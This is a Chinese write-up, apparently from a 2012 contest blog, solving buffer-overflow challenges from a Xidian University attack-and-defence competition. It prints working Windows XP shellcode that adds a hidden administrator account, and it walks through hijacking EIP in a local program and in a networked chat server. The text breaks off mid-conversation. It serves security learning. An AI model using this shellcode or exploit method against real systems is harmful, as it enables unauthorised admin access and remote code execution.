西电网络攻防第三届溢出题答案分析 by 半斤八兩
/**************************************
/* 作者:半斤八兩
/* 博客:http://hi.baidu.com/bjblcracked
/* 日期:2012-10-15 13:30
/**************************************
只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
第一题
请按照要求编写一段shellcode。
2、 要求:
(1)添加具有管理员权限用户(用户名:xd_hack, 密码:success);
(2)出现对话框,如图:
(3)添加成功后,能够退出线程,不致因溢出导致异常;
(4)运行平台:win32 XP sp3 中文;
3、 请按照正确答案格式提交,格式如下:
代码:
#include <stdio.h> char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\x51\x68\x6c\x6c\x20\x20\x68\x33" "\x32\x2e\x64\x68\x75\x73\x65\x72" "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" // 0x7c801d7b ; LoadLibraryA(user32.dll) "\xff\xd3\xb9\x5e\x67\x30\xef\x81" "\xc1\x11\x11\x11\x11\x51\x68\x61" "\x67\x65\x42\x68\x4d\x65\x73\x73" "\x89\xe1\x51\x50\xbb\x40\xae\x80" //0x7c80ae40;GetProcAddress(user32.dll, //MessageBoxA) "\x7c\xff\xd3\x89\xe1\x31\xd2\x52" "\x51\x51\x52\xff\xd0\x31\xc0\x50" "\xb8\x12\xcb\x81\x7c\xff\xd0"; // 0x7c81cb12 ; ExitProcess(0) int main(int argc, char **argv) { int (*func)(); func = (int (*)()) &shellcode; printf("Shellcode Length is : %d",strlen(shellcode)); (int)(*func)(); }
复制代码
4. 计分规则(略)
因为我之前没有玩过溢出,所以代码写的有点长..
我是先用C实现,然后用OD加载,把里面的二进制数据提取出来.
这一题,本来是想用Kernel32!WinExec来实现的.因群里面一朋友说了Netapi32.dll
的导出函数也能实现,但是不会使用.正好我也没有用过,所以就用这种方法实现.
相比之下,这种代码有点繁琐.
第1题代码:
代码:
#include "stdafx.h" #include <windows.h> #include <lm.h> DWORD (WINAPI *IsNetLocalGroupAddMembers)( LPCWSTR servername, LPCWSTR groupname, DWORD level, LPBYTE buf, DWORD totalentries ); DWORD (WINAPI *IsNetUserAdd)( LPCWSTR servername, DWORD level, LPBYTE buf, LPDWORD parm_err ); BYTE szCmdShell[] = { 0xc6, 0x45, 0xb0, 0x64, 0xc6, 0x45, 0xb1, 0xa1, 0xc6, 0x45, 0xb2, 0x30, 0xc6, 0x45, 0xb3, 0x00, 0xc6, 0x45, 0xb4, 0x00, 0xc6, 0x45, 0xb5, 0x00, 0xc6, 0x45, 0xb6, 0x8b, 0xc6, 0x45, 0xb7, 0x40, 0xc6, 0x45, 0xb8, 0x0c, 0xc6, 0x45, 0xb9, 0x8b, 0xc6, 0x45, 0xba, 0x70, 0xc6, 0x45, 0xbb, 0x1c, 0xc6, 0x45, 0xbc, 0xad, 0xc6, 0x45, 0xbd, 0x8b, 0xc6, 0x45, 0xbe, 0x40, 0xc6, 0x45, 0xbf, 0x08, 0xc6, 0x45, 0xc0, 0x8b, 0xc6, 0x45, 0xc1, 0xe8, 0xc6, 0x45, 0xc2, 0x8b, 0xc6, 0x45, 0xc3, 0x45, 0xc6, 0x45, 0xc4, 0x3c, 0xc6, 0x45, 0xc5, 0x8b, 0xc6, 0x45, 0xc6, 0x54, 0xc6, 0x45, 0xc7, 0x28, 0xc6, 0x45, 0xc8, 0x78, 0xc6, 0x45, 0xc9, 0x03, 0xc6, 0x45, 0xca, 0xd5, 0xc6, 0x45, 0xcb, 0x8b, 0xc6, 0x45, 0xcc, 0x4a, 0xc6, 0x45, 0xcd, 0x18, 0xc6, 0x45, 0xce, 0x8b, 0xc6, 0x45, 0xcf, 0x5a, 0xc6, 0x45, 0xd0, 0x20, 0xc6, 0x45, 0xd1, 0x03, 0xc6, 0x45, 0xd2, 0xdd, 0xc6, 0x45, 0xd3, 0x49, 0xc6, 0x45, 0xd4, 0x8b, 0xc6, 0x45, 0xd5, 0x34, 0xc6, 0x45, 0xd6, 0x8b, 0xc6, 0x45, 0xd7, 0x03, 0xc6, 0x45, 0xd8, 0xf5, 0xc6, 0x45, 0xd9, 0xb8, 0xc6, 0x45, 0xda, 0x47, 0xc6, 0x45, 0xdb, 0x65, 0xc6, 0x45, 0xdc, 0x74, 0xc6, 0x45, 0xdd, 0x50, 0xc6, 0x45, 0xde, 0x39, 0xc6, 0x45, 0xdf, 0x06, 0xc6, 0x45, 0xe0, 0x75, 0xc6, 0x45, 0xe1, 0xf1, 0xc6, 0x45, 0xe2, 0xb8, 0xc6, 0x45, 0xe3, 0x72, 0xc6, 0x45, 0xe4, 0x6f, 0xc6, 0x45, 0xe5, 0x63, 0xc6, 0x45, 0xe6, 0x41, 0xc6, 0x45, 0xe7, 0x39, 0xc6, 0x45, 0xe8, 0x46, 0xc6, 0x45, 0xe9, 0x04, 0xc6, 0x45, 0xea, 0x75, 0xc6, 0x45, 0xeb, 0xe7, 0xc6, 0x45, 0xec, 0x8b, 0xc6, 0x45, 0xed, 0x5a, 0xc6, 0x45, 0xee, 0x24, 0xc6, 0x45, 0xef, 0x03, 0xc6, 0x45, 0xf0, 0xdd, 0xc6, 0x45, 0xf1, 0x66, 0xc6, 0x45, 0xf2, 0x8b, 0xc6, 0x45, 0xf3, 0x0c, 0xc6, 0x45, 0xf4, 0x4b, 0xc6, 0x45, 0xf5, 0x8b, 0xc6, 0x45, 0xf6, 0x5a, 0xc6, 0x45, 0xf7, 0x1c, 0xc6, 0x45, 0xf8, 0x03, 0xc6, 0x45, 0xf9, 0xdd, 0xc6, 0x45, 0xfa, 0x8b, 0xc6, 0x45, 0xfb, 0x04, 0xc6, 0x45, 0xfc, 0x8b, 0xc6, 0x45, 0xfd, 0x03, 0xc6, 0x45, 0xfe, 0xc5, 0xc6, 0x45, 0xff, 0xc3, 0x66, 0xc7, 0x45, 0xa0, 0x78, 0x00, 0x66, 0xc7, 0x45, 0xa2, 0x64, 0x00, 0x66, 0xc7, 0x45, 0xa4, 0x5f, 0x00, 0x66, 0xc7, 0x45, 0xa6, 0x68, 0x00, 0x66, 0xc7, 0x45, 0xa8, 0x61, 0x00, 0x66, 0xc7, 0x45, 0xaa, 0x63, 0x00, 0x66, 0xc7, 0x45, 0xac, 0x6b, 0x00, 0x66, 0xc7, 0x45, 0xae, 0x00, 0x00, 0x66, 0xc7, 0x45, 0x90, 0x53, 0x00, 0x66, 0xc7, 0x45, 0x92, 0x75, 0x00, 0x66, 0xc7, 0x45, 0x94, 0x63, 0x00, 0x66, 0xc7, 0x45, 0x96, 0x63, 0x00, 0x66, 0xc7, 0x45, 0x98, 0x65, 0x00, 0x66, 0xc7, 0x45, 0x9a, 0x73, 0x00, 0x66, 0xc7, 0x45, 0x9c, 0x73, 0x00, 0x66, 0xc7, 0x45, 0x9e, 0x00, 0x00, 0xc6, 0x45, 0x84, 0x4f, 0xc6, 0x45, 0x85, 0x76, 0xc6, 0x45, 0x86, 0x65, 0xc6, 0x45, 0x87, 0x72, 0xc6, 0x45, 0x88, 0x66, 0xc6, 0x45, 0x89, 0x6c, 0xc6, 0x45, 0x8a, 0x6f, 0xc6, 0x45, 0x8b, 0x77, 0xc6, 0x45, 0x8c, 0x00, 0xc6, 0x85, 0x74, 0xff, 0xff, 0xff, 0x45, 0xc6, 0x85, 0x75, 0xff, 0xff, 0xff, 0x78, 0xc6, 0x85, 0x76, 0xff, 0xff, 0xff, 0x70, 0xc6, 0x85, 0x77, 0xff, 0xff, 0xff, 0x6f, 0xc6, 0x85, 0x78, 0xff, 0xff, 0xff, 0x69, 0xc6, 0x85, 0x79, 0xff, 0xff, 0xff, 0x74, 0xc6, 0x85, 0x7a, 0xff, 0xff, 0xff, 0x20, 0xc6, 0x85, 0x7b, 0xff, 0xff, 0xff, 0x73, 0xc6, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x75, 0xc6, 0x85, 0x7d, 0xff, 0xff, 0xff, 0x63, 0xc6, 0x85, 0x7e, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x7f, 0xff, 0xff, 0xff, 0x73, 0xc6, 0x45, 0x80, 0x73, 0xc6, 0x45, 0x81, 0x00, 0xc6, 0x85, 0x64, 0xff, 0xff, 0xff, 0x6e, 0xc6, 0x85, 0x65, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x66, 0xff, 0xff, 0xff, 0x74, 0xc6, 0x85, 0x67, 0xff, 0xff, 0xff, 0x61, 0xc6, 0x85, 0x68, 0xff, 0xff, 0xff, 0x70, 0xc6, 0x85, 0x69, 0xff, 0xff, 0xff, 0x69, 0xc6, 0x85, 0x6a, 0xff, 0xff, 0xff, 0x33, 0xc6, 0x85, 0x6b, 0xff, 0xff, 0xff, 0x32, 0xc6, 0x85, 0x6c, 0xff, 0xff, 0xff, 0x2e, 0xc6, 0x85, 0x6d, 0xff, 0xff, 0xff, 0x64, 0xc6, 0x85, 0x6e, 0xff, 0xff, 0xff, 0x6c, 0xc6, 0x85, 0x6f, 0xff, 0xff, 0xff, 0x6c, 0xc6, 0x85, 0x70, 0xff, 0xff, 0xff, 0x00, 0x66, 0xc7, 0x85, 0x44, 0xff, 0xff, 0xff, 0x41, 0x00, 0x66, 0xc7, 0x85, 0x46, 0xff, 0xff, 0xff, 0x64, 0x00, 0x66, 0xc7, 0x85, 0x48, 0xff, 0xff, 0xff, 0x6d, 0x00, 0x66, 0xc7, 0x85, 0x4a, 0xff, 0xff, 0xff, 0x69, 0x00, 0x66, 0xc7, 0x85, 0x4c, 0xff, 0xff, 0xff, 0x6e, 0x00, 0x66, 0xc7, 0x85, 0x4e, 0xff, 0xff, 0xff, 0x69, 0x00, 0x66, 0xc7, 0x85, 0x50, 0xff, 0xff, 0xff, 0x73, 0x00, 0x66, 0xc7, 0x85, 0x52, 0xff, 0xff, 0xff, 0x74, 0x00, 0x66, 0xc7, 0x85, 0x54, 0xff, 0xff, 0xff, 0x72, 0x00, 0x66, 0xc7, 0x85, 0x56, 0xff, 0xff, 0xff, 0x61, 0x00, 0x66, 0xc7, 0x85, 0x58, 0xff, 0xff, 0xff, 0x74, 0x00, 0x66, 0xc7, 0x85, 0x5a, 0xff, 0xff, 0xff, 0x6f, 0x00, 0x66, 0xc7, 0x85, 0x5c, 0xff, 0xff, 0xff, 0x72, 0x00, 0x66, 0xc7, 0x85, 0x5e, 0xff, 0xff, 0xff, 0x73, 0x00, 0x66, 0xc7, 0x85, 0x60, 0xff, 0xff, 0xff, 0x00, 0x00, 0xc6, 0x85, 0x38, 0xff, 0xff, 0xff, 0x4e, 0xc6, 0x85, 0x39, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x3a, 0xff, 0xff, 0xff, 0x74, 0xc6, 0x85, 0x3b, 0xff, 0xff, 0xff, 0x55, 0xc6, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x73, 0xc6, 0x85, 0x3d, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x3e, 0xff, 0xff, 0xff, 0x72, 0xc6, 0x85, 0x3f, 0xff, 0xff, 0xff, 0x41, 0xc6, 0x85, 0x40, 0xff, 0xff, 0xff, 0x64, 0xc6, 0x85, 0x41, 0xff, 0xff, 0xff, 0x64, 0xc6, 0x85, 0x42, 0xff, 0xff, 0xff, 0x00, 0xc6, 0x85, 0x20, 0xff, 0xff, 0xff, 0x4e, 0xc6, 0x85, 0x21, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x22, 0xff, 0xff, 0xff, 0x74, 0xc6, 0x85, 0x23, 0xff, 0xff, 0xff, 0x4c, 0xc6, 0x85, 0x24, 0xff, 0xff, 0xff, 0x6f, 0xc6, 0x85, 0x25, 0xff, 0xff, 0xff, 0x63, 0xc6, 0x85, 0x26, 0xff, 0xff, 0xff, 0x61, 0xc6, 0x85, 0x27, 0xff, 0xff, 0xff, 0x6c, 0xc6, 0x85, 0x28, 0xff, 0xff, 0xff, 0x47, 0xc6, 0x85, 0x29, 0xff, 0xff, 0xff, 0x72, 0xc6, 0x85, 0x2a, 0xff, 0xff, 0xff, 0x6f, 0xc6, 0x85, 0x2b, 0xff, 0xff, 0xff, 0x75, 0xc6, 0x85, 0x2c, 0xff, 0xff, 0xff, 0x70, 0xc6, 0x85, 0x2d, 0xff, 0xff, 0xff, 0x41, 0xc6, 0x85, 0x2e, 0xff, 0xff, 0xff, 0x64, 0xc6, 0x85, 0x2f, 0xff, 0xff, 0xff, 0x64, 0xc6, 0x85, 0x30, 0xff, 0xff, 0xff, 0x4d, 0xc6, 0x85, 0x31, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x32, 0xff, 0xff, 0xff, 0x6d, 0xc6, 0x85, 0x33, 0xff, 0xff, 0xff, 0x62, 0xc6, 0x85, 0x34, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x35, 0xff, 0xff, 0xff, 0x72, 0xc6, 0x85, 0x36, 0xff, 0xff, 0xff, 0x73, 0xc6, 0x85, 0x37, 0xff, 0xff, 0xff, 0x00, 0xc7, 0x85, 0x1c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x18, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x14, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x55, 0x8d, 0x85, 0xb0, 0xff, 0xff, 0xff, 0xff, 0xd0, 0x5d, 0x89, 0x85, 0x14, 0xff, 0xff, 0xff, 0xc7, 0x85, 0x10, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x64, 0xff, 0xff, 0xff, 0x50, 0xb8, 0x7b, 0x1d, 0x80, 0x7c, 0xff, 0xd0, 0x89, 0x85, 0x10, 0xff, 0xff, 0xff, 0x8d, 0x85, 0x38, 0xff, 0xff, 0xff, 0x50, 0x8b, 0x85, 0x10, 0xff, 0xff, 0xff, 0x50, 0x8b, 0x85, 0x14, 0xff, 0xff, 0xff, 0xff, 0xd0, 0x89, 0x85, 0x1c, 0xff, 0xff, 0xff, 0x8d, 0x85, 0x20, 0xff, 0xff, 0xff, 0x50, 0x8b, 0x85, 0x10, 0xff, 0xff, 0xff, 0x50, 0x8b, 0x85, 0x14, 0xff, 0xff, 0xff, 0xff, 0xd0, 0x89, 0x85, 0x18, 0xff, 0xff, 0xff, 0xc7, 0x85, 0x0c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xec, 0xfe, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x07, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x8d, 0xbd, 0xf0, 0xfe, 0xff, 0xff, 0xf3, 0xab, 0x8d, 0x45, 0xa0, 0x89, 0x85, 0xec, 0xfe, 0xff, 0xff, 0x8d, 0x4d, 0x90, 0x89, 0x8d, 0xf0, 0xfe, 0xff, 0xff, 0xc7, 0x85, 0xf8, 0xfe, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe8, 0xfe, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xa0, 0x89, 0x95, 0xe8, 0xfe, 0xff, 0xff, 0x8d, 0x85, 0x0c, 0xff, 0xff, 0xff, 0x50, 0x8d, 0x85, 0xec, 0xfe, 0xff, 0xff, 0x50, 0x6a, 0x01, 0x6a, 0x00, 0x8b, 0x85, 0x1c, 0xff, 0xff, 0xff, 0xff, 0xd0, 0x6a, 0x01, 0x8d, 0x85, 0xe8, 0xfe, 0xff, 0xff, 0x50, 0x6a, 0x03, 0x8d, 0x85, 0x44, 0xff, 0xff, 0xff, 0x50, 0x6a, 0x00, 0x8b, 0x85, 0x18, 0xff, 0xff, 0xff, 0xff, 0xd0, 0x6a, 0x40, 0x8d, 0x85, 0x84, 0xff, 0xff, 0xff, 0x50, 0x8d, 0x85, 0x74, 0xff, 0xff, 0xff, 0x50, 0x6a, 0x00, 0xb8, 0xea, 0x07, 0xd5, 0x77, 0xff, 0xd0, 0xc3/* 0x6a, 0xff, 0xb8, 0x12, 0xcb, 0x81, 0x7c, 0xff, 0xd0*/ }; int main(int argc, wchar_t *argv[]) { _asm { push ebp mov ebp, esp sub esp, 0x308 lea eax, szCmdShell call eax mov esp, ebp pop ebp } return 0; // 下面的,我是先用C实现,发现提取出来的有重定位问题, // 然后部分换成汇编的.就解决了. // 除了Kernel32!ExitProcess 和 User32!MessageBoxA 是硬编码的 // 其它的全部是从TEP里面取的. // GetProcAddress BYTE szGetProcAddress[] = { 0x64, 0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x40, 0x08, 0x8b, 0xe8, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x28, 0x78, 0x03, 0xd5, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x03, 0xdd, 0x49, 0x8b, 0x34, 0x8b, 0x03, 0xf5, 0xb8, 0x47, 0x65, 0x74, 0x50, 0x39, 0x06, 0x75, 0xf1, 0xb8, 0x72, 0x6f, 0x63, 0x41, 0x39, 0x46, 0x04, 0x75, 0xe7, 0x8b, 0x5a, 0x24, 0x03, 0xdd, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x03, 0xdd, 0x8b, 0x04, 0x8b, 0x03, 0xc5, 0xc3 }; wchar_t szName[] = {0x78, 0x64, 0x5f, 0x68, 0x61, 0x63, 0x6b, 0x00}; wchar_t szPass[] = {0x53, 0x75, 0x63, 0x63, 0x65, 0x73, 0x73, 0x00}; char szCaption[] = {0x4f, 0x76, 0x65, 0x72, 0x66, 0x6c, 0x6f, 0x77, 0x00}; char szContent[] = {0x45, 0x78, 0x70, 0x6f, 0x69, 0x74, 0x20, 0x73, 0x75, 0x63, 0x65, 0x73, 0x73, 0x00}; char szNetapi32[] = {0x6e, 0x65, 0x74, 0x61, 0x70, 0x69, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00}; wchar_t szAdministroatr[] = {0x41, 0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x73, 0x00}; char szNetUserAdd[] = {0x4e, 0x65, 0x74, 0x55, 0x73, 0x65, 0x72, 0x41, 0x64, 0x64, 0x00}; char szNetLocalGroupAddMembers[] = { 0x4e, 0x65, 0x74, 0x4c, 0x6f, 0x63, 0x61, 0x6c, 0x47, 0x72, 0x6f, 0x75, 0x70, 0x41, 0x64, 0x64, 0x4d, 0x65, 0x6d, 0x62, 0x65, 0x72, 0x73, 0x00}; DWORD dwNetUserAdd = 0; DWORD dwNetLocalGroupAddMembers = 0; DWORD dwGetProcAddress = 0; _asm { push ebp lea eax, szGetProcAddress call eax pop ebp mov dwGetProcAddress, eax } //HMODULE hNetAddress = (HMODULE)LoadLibraryA(szNetapi32); HMODULE hNetAddress = NULL; _asm { lea eax, szNetapi32 push eax mov eax, 0x7C801D7B call eax mov hNetAddress, eax } // IsNetUserAdd = (DWORD (WINAPI *)(LPCWSTR, DWORD, LPBYTE, LPDWORD)) // GetProcAddress(hNetAddress, "NetUserAdd"); _asm { lea eax, szNetUserAdd push eax mov eax, hNetAddress push eax mov eax, dwGetProcAddress call eax mov dwNetUserAdd, eax } // // IsNetLocalGroupAddMembers = (DWORD (WINAPI *)(LPCWSTR, LPCWSTR, DWORD, LPBYTE, DWORD)) // GetProcAddress(hNetAddress, "NetLocalGroupAddMembers"); _asm { lea eax, szNetLocalGroupAddMembers push eax mov eax, hNetAddress push eax mov eax, dwGetProcAddress call eax mov dwNetLocalGroupAddMembers, eax } DWORD dwError = 0; USER_INFO_1 tagInfo = {0}; tagInfo.usri1_name = szName; tagInfo.usri1_password = szPass; tagInfo.usri1_priv = USER_PRIV_USER; LOCALGROUP_MEMBERS_INFO_3 tagLocalgroup = {0}; tagLocalgroup.lgrmi3_domainandname = szName; //IsNetUserAdd(NULL, 1, (PUCHAR)&tagInfo, &dwError); _asm { lea eax, dwError push eax lea eax, tagInfo push eax push 1 push 0 mov eax, dwNetUserAdd call eax } //IsNetLocalGroupAddMembers(NULL, szAdministroatr, 3, (PUCHAR)&tagLocalgroup, 1); _asm { push 1 lea eax, tagLocalgroup push eax push 3 lea eax, szAdministroatr push eax push 0 mov eax, dwNetLocalGroupAddMembers call eax } //MessageBox(NULL, szContent, szCaption, MB_ICONINFORMATION); _asm { push 0x40 lea eax, szCaption push eax lea eax, szContent push eax push 0 mov eax, 0x77D507EA call eax } //ExitProcess(-1); _asm { push -1 mov eax, 0x7C81CB12 call eax } return 0; }
第二题:
第二题说明
请输入一段字符串;
目的是使程序显示如下对话框:
不得修改程序本身;
提交答案,给出字符串内容。
第二题,算是溢出4题里面最简单的了.
运行起来后,我们可以填充一些垃圾信息,长度可以随意输入,直到它会弹错.
我们先输入 "123456789123456789123456789123456789"
这时候会弹一个如下提示的错误:
---------------------------
exploit_2.exe - 应用程序错误
---------------------------
"0x35343332" 指令引用的 "0x35343332" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
其中 "0x35343332" 就是我们要找的数据了 0x32 0x33 0x34 0x35
对应的ASCII 正好是 "2345"
那么我们就将上面最后一个出现的 "2345" 替换成 "AAAA" 再试试 "1234567891234567891234567891AAAA"
这时候弹提示:
---------------------------
exploit_2.exe - 应用程序错误
---------------------------
"0x41414141" 指令引用的 "0x41414141" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
0x41 0x41 0x41 0x41 对应的 ASCII 正好是我们最后输入的 "AAAA"
能看到这样的提示,很关键,这说明我们已经拥有了 程序的EIP控制权限了.
一开始是想写shellcode的,但是在OD中发现,程序自身有一段MessageBox的调用.
而且提示和标题,与要求中的一模一样的.再看一下要求,说不得修改程序自身,如果直接调用
那个提示,也没有修改程序,于是,就直接调用即可了.我们来看一下反汇编中的代码.
代码:
00401010 |> \55 push ebp 00401011 |. 8BEC mov ebp,esp 00401013 |. 83EC 58 sub esp,58 00401016 |. 53 push ebx 00401017 |. 56 push esi 00401018 |. 57 push edi 00401019 |. 8D7D A8 lea edi,[local.22] 0040101C |. B9 16000000 mov ecx,16 00401021 |. B8 CCCCCCCC mov eax,CCCCCCCC 00401026 |. F3:AB rep stos dword ptr es:[edi] 00401028 |. C745 FC DDCCB>mov [local.1],AABBCCDD 0040102F |. C745 F8 AADDC>mov [local.2],BBCCDDAA 00401036 |. C745 F4 CCBBA>mov [local.3],DDAABBCC 0040103D |. C745 F0 DDAAB>mov [local.4],CCBBAADD 00401044 |. 66:A1 2C50420>mov ax,word ptr ds:[42502C] 0040104A |. 66:8945 E8 mov word ptr ss:[ebp-18],ax 0040104E |. 33C9 xor ecx,ecx 00401050 |. 894D EA mov dword ptr ss:[ebp-16],ecx 00401053 |. 66:894D EE mov word ptr ss:[ebp-12],cx 00401057 |. 68 DC5F4200 push exploit_.00425FDC ; please input the string: 0040105C |. E8 FFE80000 call exploit_.0040F960 00401061 |. 83C4 04 add esp,4 00401064 |. 8D55 E8 lea edx,[local.6] 00401067 |. 52 push edx 00401068 |. 68 28504200 push exploit_.00425028 ; %s 0040106D |. E8 7E000000 call exploit_.004010F0 ; // 这里调用ReadFile读取用户输入的信息 00401072 |. 83C4 08 add esp,8 ; // _cdecl约定,函数外平衡 00401075 |. 817D FC AADDC>cmp [local.1],BBCCDDAA ; // 这里拿0xBBCCDDAA 和我们输入的 0x36353433 做比较, 0040107C |. 75 38 jnz short exploit_.004010B6 ; // 不相等,就跳走 0040107E |. 817D F8 CCBBA>cmp [local.2],DDAABBCC ; // 这里拿0xDDAABBCC 和我们输入的 0x32313938 做比较, 00401085 |. 75 2F jnz short exploit_.004010B6 ; // 不相等,就跳走 00401087 |. 817D F4 DDAAB>cmp [local.3],CCBBAADD ; // 这里拿0xCCBBAADD 和我们输入的 0x37363534 做比较, 0040108E |. 75 26 jnz short exploit_.004010B6 ; // 不相等,就跳走 00401090 |. 817D F0 DDCCB>cmp [local.4],AABBCCDD ; // 这里拿0xAABBCCDD 和我们输入的 0x33323139 做比较, 00401097 |. 75 1D jnz short exploit_.004010B6 ; // 不相等,就跳走 00401099 |. 8BF4 mov esi,esp ; // 搞掂 :) 0040109B |. 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL 0040109D |. 68 1C504200 push exploit_.0042501C ; |Exploit2 004010A2 |. 68 D05F4200 push exploit_.00425FD0 ; |Success! 004010A7 |. 6A 00 push 0 ; |hOwner = NULL 004010A9 |. FF15 B4D24200 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA 004010AF |. 3BF4 cmp esi,esp 004010B1 |. E8 9A000000 call exploit_.00401150 004010B6 |> 5F pop edi 004010B7 |. 5E pop esi 004010B8 |. 5B pop ebx 004010B9 |. 83C4 58 add esp,58 004010BC |. 3BEC cmp ebp,esp 004010BE |. E8 8D000000 call exploit_.00401150 004010C3 |. 8BE5 mov esp,ebp 004010C5 |. 5D pop ebp 004010C6 \. C3 retn
第三题:
第三题说明
1. Exploit.exe程序是一个简易的网络聊天工具;
2. 该程序在接收字符串没有进行边界检查,存在缓冲区溢出漏洞;
3. 请你找出bug,并尝试exploit,以打开cmd.exe为成功;
4. 需要简要文字叙述;
5. 提交格式可参考附件。
第三题,其实和第二题差不多的,唯一不同的是,一个是通过ReadFile读取用户输入的.
一个是用socket接收用户输入的.
首先,我们要通过send像第二题那样,来触发错误提示.
这个程序,即可做为客户端,又可以做为服务端. 我们启动两份.
其中一份 在类型处 选择 服务器 然后点 开始监听.
另一份 在类型处 选择 客户端 ,然后 计算器IP,因为我们是在一台电脑上,
我们可以输入回环地址 127.0.0.1 然后点开始监听.
这个时候,我们就可以输入任意的消息内容.然后点发送.图:
从图中,我们可以看出,发送,和接收,都很正常.
我们输入一些垃圾信息测试,发现依然正常发送与接收.那么我们加大垃圾信息,
当试了N次后,在发送N多的数据报时,服务端,终于结束了.但是,并没有弹错误提示.
没有弹错,我们就不能定位关键点了,这个怎么办?
我们只有拿出利器 OD 载入服务端程序,看看他是怎么处理数据包的.我们OD载入服务端程序.
直接运行,然后设置好是服务端. 这样的聊天工具,一般都是用TCP协议的. 我们就对SOCKET的RECV下断点. 下了断点后,发送消息,我们发现,程序并没有断下. 也许是用的M$的那套方法.我们再试试WSARECV. 结果成功断下.
断下后,我们打开MSDN,看看这个函数的结构.(经常搞网络验证类的程序破解的童鞋,应该相当熟悉了)
WSARecv
The WSARecv function receives data from a connected socket.
int WSARecv(
SOCKET s,
LPWSABUF lpBuffers,
DWORD dwBufferCount,
LPDWORD lpNumberOfBytesRecvd,
LPDWORD lpFlags,
LPWSAOVERLAPPED lpOverlapped,
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
重点,我们看第二个参数.它是一个 LPWSABUF 指针类型的. 其中 WSABUF 又是一个结构体.
typedef struct __WSABUF {
u_long len; // 这里就是缓冲区的大小了.
char FAR *buf; // 缓冲区
} WSABUF, FAR * LPWSABUF;
我们到OD里面看看,他的缓冲区是多大.
断下后:
0012F88C 71A42EA3 /CALL to WSARecv from wsock32.71A42E9E
0012F890 0000021C |Socket = 21C
0012F894 0012F8AC |pBuffers = 0012F8AC
0012F898 00000001 |nBuffers = 1
0012F89C 0012F8C4 |pReceivedCount = 0012F8C4
0012F8A0 0012F8C0 |pFlags = 0012F8C0
0012F8A4 00000000 |pOverlapped = NULL
0012F8A8 00000000 \Callback = NULL
我们跟到0x0012F8AC这个地址处:
0012F8AC 00000400 // 这里就是缓冲区的大小了.
0012F8B0 00A56418 // 缓冲区
我们来整理一下所知道的信息:
1. 缓冲区的大小是 Hex:0x400 Dec:1024.
2. 发送的数据,全部是 ASCII 的.
3. 我们知道数组是以0结尾的.
设想,如果我们输入的聊天内容,正好 1023 个字节,是不是就会覆盖掉?
我们来输入 "0123456789" 垃圾信息,来填充.直到我们输入的数据,满够.1023个字节.
温馨提示:可以输入 0123456789 然后复制粘贴N多次,保存到记事本中,然后看文件属性.
实际大小,就是我们输入的长度了.
注意:用上面的方法,
记事本菜单选项中的<格式> --> <自动换行> 选择.尽量去掉勾.
我们连接后输入 垃圾信息,点发送 终于报错了..
---------------------------
chat.exe - 应用程序错误
---------------------------
"0x33323130" 指令引用的 "0x33323130" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
我们找程序中最后的一个 0x33323130 ,同第二题一样,我们改成 "aaaa"
连接,发送.又提示错误了.
---------------------------
chat.exe - 应用程序错误
---------------------------
"0x33323130" 指令引用的 "0x33323130" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
和上面的提示是一样的.我们再找倒数第二次出现的 0x33323130. 替换成 "aaaa"
---------------------------
chat.exe - 应用程序错误
---------------------------
"0x61616161" 指令引用的 "0x61616161" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
终于成功得到服务端程序主控权了
不过这题,不像第二题那么简单.这题,我们要自己写shellcode, 要求是打开cmd.exe 我就不自己写了,真心写的太搓了,去网上找了一个现成的.
虽然我们有了eip控制权限, 可是,思来想去,我们让它往哪跳呢? 这里纠结了很久.
最后,还是要感谢宋天琢妹纸,的提示. 它给了我一个地址. 0x7FFA4512, 让我往这里跳..
半斤八兩 17:45:19
妹纸,那个 发送包的地址,如何定位?
半斤八兩 17:45:29
就是你的Shellcode 你如何得到地址?
stz 17:46:56
